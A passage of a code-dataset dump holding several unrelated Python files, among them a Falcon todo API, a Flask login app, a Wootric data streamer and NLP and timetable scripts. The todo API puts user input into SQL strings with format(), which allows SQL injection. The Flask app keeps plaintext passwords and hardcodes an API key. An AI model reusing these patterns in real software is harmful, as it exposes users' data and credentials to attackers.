format_extended_arg}\nfinalize_opcodes(l)","sub_path":"pycfiles/xdis-4.4.0-py2.4/opcode_22.py","file_name":"opcode_22.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"69342334","text":"import os\nimport os.path\nimport json\nimport logging\nimport tempfile\n\nfrom introspection_handler import IntrospectionHandler\nfrom util import copy_origin\n\nlog = logging.getLogger(__name__)\n\nclass RestCollectionHandler(IntrospectionHandler):\n \"\"\"\n Reference: https://en.wikipedia.org/wiki/REST\n\n Collections are represented as directories. The supported operations are\n\n - GET: list the URIs of the collection members\n - PUT: not supported\n - POST: create a new entry and assign a new URI\n - DELETE: clear the collection\n \"\"\"\n id_key = \"id\"\n\n def handle_collection(self, method, *args):\n return self.call_handler(\"handle_collection_\" + method, method, *args)\n\n def handle_collection_GET(self, path, rfile, headers, *args):\n items = os.listdir(path)\n items = [{self.id_key: key} for key in items]\n\n yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n yield json.dumps(items, indent=2)\n\n def handle_collection_PUT(self, path, rfile, headers, *args):\n def createFile(path):\n return tempfile.NamedTemporaryFile(mode=\"w\", dir=path, delete=False)\n\n length = headers['content-length']\n data = rfile.read(int(length))\n\n with createFile(path) as fobj:\n fobj.write(data)\n\n fname = fobj.name\n basename = os.path.basename(fname)\n\n yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n yield json.dumps({ \"key\": basename }, indent=2)\n\n def handle_collection_DELETE(self, path, rfile, headers, *args):\n for basename in os.listdir(path):\n fname = os.path.join(path, basename)\n log.info(\"delete %s\", fname)\n\n os.remove(fname)\n\n yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n yield json.dumps({ \"result\": \"success\"}, indent=2)\n\n","sub_path":"simple_rest_server/handler/rest_collection_handler.py","file_name":"rest_collection_handler.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"524586327","text":"\"\"\"\nThis script does all the heavy-lifting of setting up the\n initial databases...\ntopn ~ limit/5 seems a good number to ensure\n the combination of having enough traits\n yet avoiding matches that are completely irrelevant\n\"\"\"\n\nimport nltk\nimport zipfile\nfrom nltk.corpus import brown\nfrom gensim.models import KeyedVectors\n\nfrom tqdm import tqdm\n\nfrom populate_traits_lib import *\nfrom trait_dao import TraitDao\n\nTraitDao.create_tables()\nTraitDao.empty_tables()\n\n# using the regular download can result in certificate problems\n# which are hard to resolve without root access to computer\n# but if you have root access to computers, this is the simplest way to\n# download the brown corpora:\n# nltk.download('brown')\n\nprint(\"Extracting brown corpora to directory\")\nzip_ref = zipfile.ZipFile('brown.zip', 'r')\n# if nltk.data.path[0] fails, just try [1],[2],... and so on\n# on our system we had about 10 alternative paths, eg. [0]~[9]\n# you need write permissions to the path you choose\nzip_ref.extractall(nltk.data.path[0])\nzip_ref.close()\n\nprint(\"Loading GoogleNews-vectors into word2vec (~30 seconds)\")\nmodel = KeyedVectors.load_word2vec_format(\n 'GoogleNews-vectors-negative300.bin.gz',\n binary=True,\n limit=500000\n)\n\nprint(\"Extracting words from word2vec model\")\nfriendliness = model.most_similar(\n positive=['friendly', 'affectionate', 'loving', 'kind'],\n negative=['hostile', 'hurtful', 'unfriendly', 'mean'],\n topn=100000\n)\nunfriendliness = model.most_similar(\n positive=['hostile', 'hurtful', 'unfriendly', 'mean'],\n negative=['friendly', 'affectionate', 'loving', 'kind'],\n topn=100000\n)\ndominance = model.most_similar(\n positive=['dominant', 'assertive', 'capable', 'important'],\n negative=['submissive', 'apologetic', 'meek', 'passive'],\n topn=100000\n)\nundominance = model.most_similar(\n positive=['submissive', 'apologetic', 'meek', 'passive'],\n negative=['dominant', 'assertive', 'capable', 'important'],\n topn=100000\n)\n\n# set of over 8000 adjectives\nadjectives = {word for word, pos in brown.tagged_words()\n if pos.startswith('JJ')}\n\nprint(\"Filtering for adjectives from extracted words\")\nfriendliness = filter_adjectives(friendliness, adjectives)\nunfriendliness = filter_adjectives(unfriendliness, adjectives)\ndominance = filter_adjectives(dominance, adjectives)\nundominance = filter_adjectives(undominance, adjectives)\n\nprint(\"Scaling the list to fit the range (0,10) or (-10,0)\")\nfriendliness = scale_my_list(friendliness, True)\nunfriendliness = scale_my_list(unfriendliness, False)\ndominance = scale_my_list(dominance, True)\nundominance = scale_my_list(undominance, False)\n\nprint(\"Adding traits to database:\")\nprint(\"- 1/4\")\nfor trait in tqdm(friendliness):\n TraitDao.add_friendliness_trait(trait[0], trait[1])\nprint(\"- 2/4\")\nfor trait in tqdm(unfriendliness):\n TraitDao.add_friendliness_trait(trait[0], trait[1])\nprint(\"- 3/4\")\nfor trait in tqdm(dominance):\n TraitDao.add_dominance_trait(trait[0], trait[1])\nprint(\"- 4/4\")\nfor trait in tqdm(undominance):\n TraitDao.add_dominance_trait(trait[0], trait[1])\n\nprint(\"traits.db is ready!\")\n","sub_path":"interpersonal/build_traits_database/populate_traits.py","file_name":"populate_traits.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"84747901","text":"import falcon\nimport json\nimport logging\nimport time\nimport datetime\nimport falcon_cors\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\n\n\ncors = falcon_cors.CORS(\n allow_origins_list=['http://localhost:4200'], allow_all_methods=True, allow_all_headers=True)\n\n\nclass Parent():\n def __init__(self, connection):\n self.connection = connection\n pass\n\n def get_body(self, req):\n return req.stream.read(req.content_length or 0).decode('utf-8')\n\n def get_json_body(self, req):\n try:\n return json.loads(self.get_body(req))\n except json.decoder.JSONDecodeError:\n raise falcon.HTTPError(falcon.HTTP_400, 'Malformed JSON')\n\n def date_handler(self, obj):\n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n elif obj is None:\n return obj\n else:\n raise TypeError\n\n\nclass Todos(Parent):\n # def __init__(self): # constructor\n # pass\n\n # on_get is because of falcon. self is becuse of python functions\n\n def on_get(self, req, resp):\n\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n cursor.execute(\"SELECT * FROM todos ORDER BY created DESC\")\n todos = cursor.fetchall()\n\n self.connection.commit()\n cursor.close()\n logging.warning(todos)\n\n resp.status = falcon.HTTP_200\n\n resp.body = json.dumps(todos, default=self.date_handler)\n\n # on_post is because of falcon. self is becuse of python functions\n def on_post(self, req, resp):\n body = self.get_json_body(req)\n\n name = body.get('name', None)\n if name is None:\n raise falcon.HTTPError(\n falcon.HTTP_400, 'Name field cannot be empty')\n\n newTodo = {\n \"name\": name\n }\n\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n cursor.execute(\"\"\"\n INSERT INTO todos (name) VALUES ('{name}') RETURNING id,name, created, completed, complete\n \"\"\".format(name=newTodo.get('name')))\n\n # sql_string = \"INSERT INTO todos (name) VALUES (%s) RETURNING id;\"\n # cursor.execute(sql_string, (newTodo.get('name')))\n\n output = cursor.fetchone()\n logging.warning(output)\n self.connection.commit()\n cursor.close()\n\n resp.status = falcon.HTTP_201\n\n resp.body = json.dumps(output, default=self.date_handler)\n\n\nclass Todo(Parent):\n # def __init__(self): # constructor\n # pass\n\n # on_get is because of falcon. self is because of python functions\n def on_get(self, req, resp, id):\n try:\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n cursor.execute(\"\"\"\n SELECT * FROM todos WHERE id={id}\n \"\"\".format(id=id))\n\n todo = cursor.fetchone()\n\n self.connection.commit()\n cursor.close()\n logging.warning(todos)\n\n resp.status = falcon.HTTP_200\n except KeyError:\n resp.status = falcon.HTTP_404\n todo = {}\n\n resp.body = json.dumps(todo, default=self.date_handler)\n\n # on_put is because of falcon. self is because of python functions\n def on_patch(self, req, resp, id):\n body = self.get_json_body(req)\n\n try:\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n cursor.execute(\"\"\"\n SELECT * FROM todos WHERE id={id}\n \"\"\".format(id=id))\n todo = cursor.fetchone()\n\n except KeyError:\n resp.status = falcon.HTTP_404\n raise falcon.HTTPError(\n falcon.HTTP_400, 'This Todo Id does not exist')\n\n errors = []\n todoId = body.get('id', None)\n if todoId is not None:\n errors.append('Id cannot be sent')\n\n name = body.get('name', todo['name'])\n if name is None and todo['name'] is None:\n errors.append('Name field cannot be empty')\n elif type(name) is not str:\n errors.append('Name must be a string')\n\n complete = body.get('complete', None)\n if complete is None:\n errors.append('Complete field cannot be empty')\n\n if type(complete) is not bool:\n errors.append('Complete must be a boolean')\n\n created = body.get('created', None)\n\n if created is not None:\n try:\n datetime.datetime.fromtimestamp(created)\n except TypeError: # throw onºy this try the except if TypeError\n errors.append('Created time is not valid')\n\n if created >= int(time.time()):\n newCreated = created\n else:\n errors.append('Created time cannot be before now')\n\n completed = body.get('completed', None)\n if completed is not None:\n errors.append('Completed time cannot be sent')\n\n if todo['completed'] is None and complete is True:\n completed = datetime.datetime.now()\n\n if todo['completed'] is None and complete is False:\n completed = None\n\n if todo['complete'] is True and complete is False:\n completed = None\n\n updatedTodo = {\n \"id\": todo['id'],\n \"complete\": complete,\n \"name\": name,\n \"completed\": completed,\n }\n\n if len(errors):\n raise falcon.HTTPError(\n falcon.HTTP_400, 'Errors', errors)\n\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n if complete is True:\n cursor.execute(\"\"\"\n UPDATE todos SET name=('{name}'),completed=('{completed}'),complete=('{complete}') WHERE id = ('{id}') RETURNING id, name, created, completed, complete\n \"\"\".format(name=updatedTodo.get('name'), completed=updatedTodo.get('completed'), complete=updatedTodo.get('complete'), id=updatedTodo.get('id')))\n else:\n cursor.execute(\"\"\"\n UPDATE todos SET name=('{name}'),completed=NULL,complete=('{complete}') WHERE id = ('{id}') RETURNING id, name, created, completed, complete\n \"\"\".format(name=updatedTodo.get('name'), complete=updatedTodo.get('complete'), id=updatedTodo.get('id')))\n\n output = cursor.fetchone()\n\n logging.warning(output)\n self.connection.commit()\n cursor.close()\n\n resp.status = falcon.HTTP_201\n resp.body = json.dumps(output, default=self.date_handler)\n\n def on_delete(self, req, resp, id):\n try:\n cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n cursor.execute(\"\"\"\n DELETE FROM todos WHERE id={id}\n \"\"\".format(id=id))\n\n self.connection.commit()\n cursor.close()\n\n resp.status = falcon.HTTP_200\n except KeyError:\n resp.status = falcon.HTTP_404\n\n resp.body = json.dumps({\"message\": \"deleted\"})\n\n\n# // connection to db\ndef connect_to_database():\n def _do_connnect():\n logging.warning('trying to connect')\n connection = psycopg2.connect(\n dbname='todos',\n user='postgres',\n password='',\n host='database'\n )\n return connection\n\n tries = 0\n connection = False\n\n while not connection:\n try:\n connection = _do_connnect()\n except psycopg2.OperationalError as e:\n logging.warning(\n 'Database not available, waiting try: {}'.format(tries))\n\n if tries > 5:\n raise e\n\n time.sleep(2)\n finally:\n tries += 1\n\n logging.warning('database available')\n return connection\n\n\nconnection = connect_to_database()\n\napp = falcon.API(middleware=[cors.middleware])\n\ntodos = Todos(connection)\ntodo = Todo(connection)\n\napp.add_route('/todos', todos)\napp.add_route('/todos/{id}', todo)\n","sub_path":"src/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26572775","text":"import os\nimport argparse\nimport logging\nimport requests\nimport stitchstream\nimport sys\nimport json\nimport datetime\n\nsession = requests.Session()\nlogger = logging.getLogger()\nbookmark = {}\n\ndef get_env_or_throw(key):\n value = os.environ.get(key)\n\n if value == None:\n raise Exception('Missing ' + key + ' environment variable!')\n\n return value\n\ndef configure_logging(level=logging.DEBUG):\n global logger\n logger.setLevel(level)\n ch = logging.StreamHandler()\n ch.setLevel(level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\ndef authed_get(url):\n return session.request(method='get', url=url)\n\ndef authed_get_all_pages(baseUrl, bookmarkName):\n global bookmark\n while True:\n url = baseUrl\n if bookmark.get(bookmarkName, None):\n url = baseUrl + '&created[gt]=' + bookmark[bookmarkName]\n r = authed_get(url)\n rJson = r.json();\n yield r\n if len(rJson) <= 1:\n break\n\ndef wootricdate_to_datetime(wootricDateString):\n return datetime.datetime.strptime(wootricDateString, '%Y-%m-%d %H:%M:%S %z')\n\n\nresponse_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'score': {\n 'type': 'integer'\n },\n 'text': {\n 'type': ['string','null']\n },\n 'ip_address': {\n 'type': 'string'\n },\n 'origin_url': {\n 'type': 'string'\n },\n 'end_user_id': {\n 'type': 'integer'\n },\n 'survey_id': {\n 'type': 'integer'\n },\n 'completed': {\n 'type': 'boolean'\n },\n 'excluded_from_calculations': {\n 'type': 'boolean'\n },\n 'tags': {\n 'type': 'array',\n 'items': {\n \"type\": \"string\"\n }\n },\n },\n 'required': ['id']\n }\n\ndef get_all_new_responses():\n global bookmark\n \n last_response_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/responses?per_page=50&sort_order=asc'\n for apiResponse in authed_get_all_pages(requestUrl, 'responses'):\n responses = apiResponse.json()\n if len(responses) > 0:\n last_created_at_datetime = wootricdate_to_datetime(responses[-1]['created_at'])\n last_response_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(responses):\n responses[index]['created_at'] = wootricdate_to_datetime(responses[index]['created_at']).isoformat()\n responses[index]['updated_at'] = wootricdate_to_datetime(responses[index]['updated_at']).isoformat()\n\n stitchstream.write_records('responses', responses)\n\n #there is a limitation of wootric's API that only allows you to get 50 records at a time and has\n #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n if bookmark.get('responses', None) == str(last_response_unixtime) and len(responses) > 1:\n logger.error('Breaking retrieval loop for responses at unixtime ' + str(last_response_unixtime) + ', will cause missing data')\n last_response_unixtime = last_response_unixtime + 1\n\n if last_response_unixtime: #can be none if no new responses\n bookmark['responses'] = str(last_response_unixtime)\n\n\ndecline_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'end_user_id': {\n 'type': 'integer'\n },\n 'survey_id': {\n 'type': 'integer'\n }\n },\n 'required': ['id']\n }\n\ndef get_all_new_declines():\n global bookmark\n \n last_decline_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/declines?per_page=50&sort_order=asc'\n for response in authed_get_all_pages(requestUrl, 'declines'):\n declines = response.json()\n if len(declines) > 0:\n last_created_at_datetime = wootricdate_to_datetime(declines[-1]['created_at'])\n last_decline_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(declines):\n declines[index]['created_at'] = wootricdate_to_datetime(declines[index]['created_at']).isoformat()\n declines[index]['updated_at'] = wootricdate_to_datetime(declines[index]['updated_at']).isoformat()\n\n stitchstream.write_records('declines', declines)\n \n #there is a limitation of wootric's API that only allows you to get 50 records at a time and has\n #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n if bookmark.get('declines', None) == str(last_decline_unixtime) and len(declines) > 1:\n logger.error('Breaking retrieval loop for declines at unixtime ' + str(last_decline_unixtime) + ', will cause missing data')\n last_decline_unixtime = last_decline_unixtime + 1\n\n if last_decline_unixtime: #can be None if no new declines\n bookmark['declines'] = str(last_decline_unixtime)\n\nenduser_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'email': {\n 'type': 'string'\n },\n 'last_surveyed': {\n \"anyOf\": [\n {\n \"type\": \"null\",\n }, \n {\n \"type\": \"string\",\n 'format': 'date-time'\n }\n ]\n },\n 'external_created_at': {\n 'type': ['integer','null']\n },\n 'page_views_count': {\n 'type': 'integer'\n }\n },\n 'required': ['id']\n }\n\ndef get_all_new_endusers():\n global bookmark\n \n last_enduser_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/end_users?per_page=50&sort_order=asc'\n for response in authed_get_all_pages(requestUrl, 'endusers'):\n endusers = response.json()\n if len(endusers) > 0:\n last_created_at_datetime = wootricdate_to_datetime(endusers[-1]['created_at'])\n last_enduser_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(endusers):\n endusers[index]['created_at'] = wootricdate_to_datetime(endusers[index]['created_at']).isoformat()\n endusers[index]['updated_at'] = wootricdate_to_datetime(endusers[index]['updated_at']).isoformat()\n if endusers[index]['last_surveyed']:\n endusers[index]['last_surveyed'] = wootricdate_to_datetime(endusers[index]['last_surveyed']).isoformat()\n\n stitchstream.write_records('endusers', endusers)\n\n #there is a limitation of wootric's API that only allows you to get 50 records at a time and has\n #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n if bookmark.get('endusers', None) == str(last_enduser_unixtime) and len(endusers) > 1:\n logger.error('Breaking retrieval loop for enduers at unixtime ' + str(last_enduser_unixtime) + ', will cause missing data')\n last_enduser_unixtime = last_enduser_unixtime + 1\n\n if last_enduser_unixtime: #can be None if no new endusers\n bookmark['endusers'] = str(last_enduser_unixtime)\n\ndef get_access_token(client_id, client_secret):\n data = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n response = requests.post('https://api.wootric.com/oauth/token', data=data).json();\n if 'access_token' in response:\n return response['access_token']\n raise Exception('Access Token Retrieval Failed: ' + str(response))\n\n\nif __name__ == '__main__':\n configure_logging()\n parser = argparse.ArgumentParser(prog='Wootric Streamer')\n parser.add_argument('FILENAME', help='File containing the last bookmark value', nargs='?')\n args = parser.parse_args()\n\n client_id = get_env_or_throw('WOOTRIC_CLIENT_ID')\n client_secret = get_env_or_throw('WOOTRIC_CLIENT_SECRET')\n access_token = get_access_token(client_id, client_secret)\n session.headers.update({'authorization': 'Bearer ' + access_token})\n\n bookmark = {}\n if args.FILENAME:\n with open(args.FILENAME, 'r') as file:\n for line in file:\n bookmark = json.loads(line.strip())\n\n if bookmark.get('endusers', None):\n logger.info('Replicating endusers since %s', bookmark.get('endusers', None))\n else:\n logger.info('Replicating all endusers')\n stitchstream.write_schema('endusers', enduser_schema)\n get_all_new_endusers()\n\n if bookmark.get('responses', None):\n logger.info('Replicating responses since %s', bookmark.get('responses', None))\n else:\n logger.info('Replicating all responses')\n stitchstream.write_schema('responses', response_schema)\n get_all_new_responses()\n\n if bookmark.get('declines', None):\n logger.info('Replicating declines since %s', bookmark.get('declines', None))\n else:\n logger.info('Replicating all declines')\n stitchstream.write_schema('declines', decline_schema)\n get_all_new_declines()\n\n stitchstream.write_bookmark(bookmark)\n","sub_path":"stream_wootric.py","file_name":"stream_wootric.py","file_ext":"py","file_size_in_byte":11659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"394234470","text":"import torch\r\nfrom flair.data import Corpus\r\nfrom flair.datasets import ColumnCorpus\r\nfrom flair.data import Corpus\r\nfrom flair.embeddings import TokenEmbeddings, WordEmbeddings, StackedEmbeddings, CharacterEmbeddings, FlairEmbeddings\r\nfrom typing import List\r\nfrom flair.trainers import ModelTrainer\r\n\r\ndef get_corpus_and_tagger():\r\n columns = {0: 'text', 1: 'ner'}\r\n\r\n data_folder = 'data/'\r\n\r\n # init a corpus using column format, data folder and the names of the train, dev and test files\r\n corpus: Corpus = ColumnCorpus(data_folder, columns,\r\n train_file='train_IOB_Format_file.txt',\r\n test_file='train_IOB_Format_file.txt',\r\n dev_file=\"dev_IOB_format_file.txt\")\r\n\r\n tag_type = 'ner'\r\n\r\n # 3. make the tag dictionary from the corpus\r\n tag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\r\n\r\n embedding_types: List[TokenEmbeddings] = [\r\n\r\n WordEmbeddings('glove'),\r\n\r\n # comment in this line to use character embeddings\r\n # CharacterEmbeddings(),\r\n\r\n # comment in these lines to use flair embeddings.\r\n FlairEmbeddings('news-forward'),\r\n FlairEmbeddings('news-backward'),\r\n ]\r\n\r\n embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embedding_types)\r\n\r\n # 5. initialize sequence tagger\r\n from flair.models import SequenceTagger\r\n\r\n tagger: SequenceTagger = SequenceTagger(hidden_size=256,\r\n embeddings=embeddings,\r\n tag_dictionary=tag_dictionary,\r\n tag_type=tag_type,\r\n use_crf=True)\r\n\r\n return corpus, tagger\r\n\r\n\r\ndef train_model(corpus, tagger):\r\n trainer: ModelTrainer = ModelTrainer(tagger, corpus)\r\n\r\n # 7. start training\r\n trainer.train('models/',\r\n learning_rate=0.1,\r\n mini_batch_size=16,\r\n max_epochs=20)\r\n\r\n\r\nif __name__ == '__main__':\r\n corpus, tagger = get_corpus_and_tagger()\r\n train_model(corpus, tagger)\r\n","sub_path":"src/train_flair_model.py","file_name":"train_flair_model.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"36873191","text":"import urllib.request\nfrom icalendar import Calendar, Event\nfrom datetime import datetime, timezone, timedelta\nfrom pytz import UTC # timezone\nimport pprint\nfrom operator import attrgetter\n\n\npprint = pprint.pprint\n\n\n\nclass Event:\n module = None\n type = None\n room = None\n date = None\n end = None\n Ftime = None\n\nclass Timetable:\n @staticmethod\n def TDecode(url):\n \"\"\"Creates a list of event objects based on a ical url\"\"\"\n if url is None:\n return None # Nob hasnt given us their timetable yet\n rawCal = urllib.request.urlopen(url) # Try and download the timetable's ical\n cal = Calendar.from_ical(rawCal.read()) # Parse the ical\n events = [] # create a list of events\n\n for component in cal.walk(): # for \"thing\" in the cal\n if component.name == \"VEVENT\": # if its an event\n description = component.get('description').split(\"\\n\") # get all its information\n location = component.get('location') # unused location data because description has it more reliably\n startdt = component.get('dtstart').dt # start date/time\n enddt = component.get('dtend').dt # end date/time\n\n module = \"Undefined\"\n room = \"Undefined\"\n type = \"Undefined\"\n\n for item in description:\n item = str(item)\n if \"MODULE TITLE:\" in item: # get the modules name\n module = item.replace(\"MODULE TITLE: \", \"\")\n if \"ROOM(S):\" in item: # get the room name\n room = item.replace(\"ROOM(S): \", \"\")\n if \"EVENT TYPE:\" in item: # is it a lecture? workshop? seminar?\n type = item.replace(\"EVENT TYPE: \", \"\")\n date = \"{:02d}/{:02d}\".format(startdt.day, startdt.month)\n timeFormatted = \"{Date}-{hour:02d}:{minute:02d}\".format(Date=date, hour=startdt.hour+1,\n minute=startdt.minute)\n endFormatted = \"{hour:02d}:{minute:02d}\".format(hour=enddt.hour+1, minute=enddt.minute)\n event = Event() # create an event object\n event.module = module\n event.Ftime = timeFormatted\n event.date = startdt\n event.end = endFormatted\n event.type = type\n event.room = room\n if len(events) != 0: # put the event, in order, in the list of events\n for i in range(len(events)):\n if event.date < events[i].date:\n events.insert(i, event)\n break\n if i == len(events)-1:\n events.append(event)\n else:\n events.append(event)\n return events\n\n @staticmethod\n def next7(events):\n \"\"\"Outputs a nicely formatted human readable piece of html code for email\"\"\"\n if events is None: # nob didnt share their timetable\n return \"Your target has chosen not to share their timetable, sorry\"\n text = \"\" # the string to be outputted\n lastDate = None # the last date processed, used to split days with ==========\n for event in events:\n if datetime.now(timezone.utc) <= event.date <= (datetime.now(timezone.utc) + timedelta(days=8)): # grab the next 7days of timetables (7+1 because datetime is weird)\n # sexy formatting\n TempText = (\"||{t}->{e} || {type:<9} || {r:<7} ||
    \".format(t=event.Ftime, e=event.end, type=event.type.lower().capitalize() , r=event.room))\n TempDate = TempText[:5] # get the date of the event\n if TempDate != lastDate: # if the last event and this event are on different days\n text += \"=\"*len(TempText.replace(\"
    \", \"\")) + \"
    \" # split them with ======\n lastDate = TempDate\n text += TempText # add the nicely formatted string\n\n return text","sub_path":"backend/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263934343","text":"def regrid_2d(data_array,Nx,Ny):\n \"\"\"\n This function loads a two-dimensional numpy array and interpolates it to a new grid array with \n defined sizes using nearest neighbour interpolation. \n Inputs:\n *data_array: input array.\n *Nx: resolution of output array in x-direction.\n *Ny: resolution of output array in y-direction.\n Outputs:\n *data_array_new: output array.\n \n created by Daniel Haenelt\n Date created: 07-01-2019 \n Last modified: 09-01-2019\n \"\"\"\n import numpy as np\n from scipy.interpolate import griddata\n\n # size of input array\n data_size = np.shape(data_array)\n\n # grid of input array\n x = np.arange(0,data_size[0])\n y = np.arange(0,data_size[1])\n xgrid, ygrid = np.meshgrid(x,y)\n xgrid = np.reshape(xgrid,np.size(xgrid))\n ygrid = np.reshape(ygrid,np.size(ygrid))\n xi_old = np.stack((xgrid,ygrid),1)\n\n # grid of output array\n x_new = np.linspace(0,data_size[0],Nx)\n y_new = np.linspace(0,data_size[1],Ny)\n xgrid_new, ygrid_new = np.meshgrid(x_new,y_new)\n xgrid_new = np.reshape(xgrid_new,np.size(xgrid_new))\n ygrid_new = np.reshape(ygrid_new,np.size(ygrid_new))\n #xi_new = np.floor(np.stack((xgrid_new,ygrid_new),1))\n xi_new = np.stack((xgrid_new,ygrid_new),1)\n\n # values of input array\n data_array = np.reshape(data_array,np.size(data_array))\n\n # grid values from old grid to new grid\n data_array_new = griddata(xi_old, data_array, xi_new, method='nearest')\n data_array_new = np.reshape(data_array_new,(Nx,Ny))\n \n return data_array_new\n\n\ndef regrid_1d(data_array,N):\n \"\"\"\n This function loads a one-dimensional numpy array and interpolates it to a new grid array with \n defined sizes using nearest neighbour interpolation. \n Inputs:\n *data_array: input array.\n *N: resolution of output array.\n Outputs:\n *data_array_new: array values interpolated to new grid.\n \n created by Daniel Haenelt\n Date created: 08-01-2019 \n Last modified: 09-01-2019\n \"\"\"\n import numpy as np\n from scipy.interpolate import griddata\n\n # size of input array\n data_size = np.shape(data_array)\n\n # grid of input array\n xi_old = np.arange(0,data_size[0])\n\n # grid of output array\n #xi_new = np.floor(np.linspace(0,data_size[0],N))\n xi_new = np.linspace(0,data_size[0],N)\n\n # grid values from old grid to new grid\n data_array_new = griddata(xi_old, data_array, xi_new, method='nearest')\n \n return data_array_new\n","sub_path":"lib/simulation/regrid.py","file_name":"regrid.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"150014924","text":"import os\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, abort, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nimport requests\n\napp = Flask(__name__)\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\")\ndef index():\n\tif \"user\" in session:\n\t\treturn redirect(url_for('login'))\n\treturn render_template('index.html')\n\n@app.route(\"/registration\", methods=['POST'])\ndef register():\n\t\"\"\"Fetching all the Inputs\"\"\"\n\tinputusername = request.form.get('inputusername')\n\tinputemail = request.form.get('inputemail')\n\tinputpassword = request.form.get('inputpassword')\n\n\t\"\"\"Handing Username Section\"\"\"\n\tuser_exist = db.execute('SELECT * FROM users WHERE username = :inputusername',{'inputusername':inputusername}).fetchone()\n\tif not(user_exist is None):\n\t\treturn render_template('index.html', issue=\"Username Already Exists!\", result=\"unsuccess\")\n\n\t\"\"\"Handling Email Section\"\"\"\n\temail_exist = db.execute('SELECT * FROM users WHERE email = :inputemail',{'inputemail':inputemail}).fetchone()\n\tif not(email_exist is None):\n\t\treturn render_template('index.html', issue=\"Email Already Exists! Just Login Below\", result=\"unsuccess\")\n\telse:\n\t\treq = requests.get('https://app.verify-email.org/api/v1/UpNGc6mUVeKLPL8d2wR66dRI60Xz27Q0eJlchtqzKAO1ffil8g/verify/{}'.format(inputemail))\n\t\tresult = req.json()\n\t\tif result['status']!=1: #If equal to 1 it's mean that Email is ok/exists\n\t\t\treturn render_template(\"index.html\", issue='Invalid Email Address!', result=\"unsuccess\")\n\n\t\"\"\"Inserting data into the Database\"\"\"\n\tdb.execute(\"INSERT INTO users (username, email, password) VALUES (:inputusername, :inputemail, :inputpassword)\",{\n\t\t'inputusername':inputusername, 'inputemail': inputemail, 'inputpassword':inputpassword\n\t\t})\n\tdb.commit()\n\treturn render_template('index.html', issue=\"Registered Successfully!\", result='success')\n\n@app.route(\"/login\", methods=['POST', 'GET'])\ndef login():\n\tif request.method=='POST':\n\t\t\"\"\"Fetching all the Inputs\"\"\"\n\t\tloginusername = request.form.get('loginusername')\n\t\tloginpassword = request.form.get('loginpassword')\n\n\t\t\"\"\"Checking User Exists or Not\"\"\"\n\t\trecord_exist = db.execute('SELECT * FROM users WHERE username = :loginusername AND password = :loginpassword', {'loginusername':loginusername, 'loginpassword': loginpassword}).fetchone()\n\t\tif record_exist is 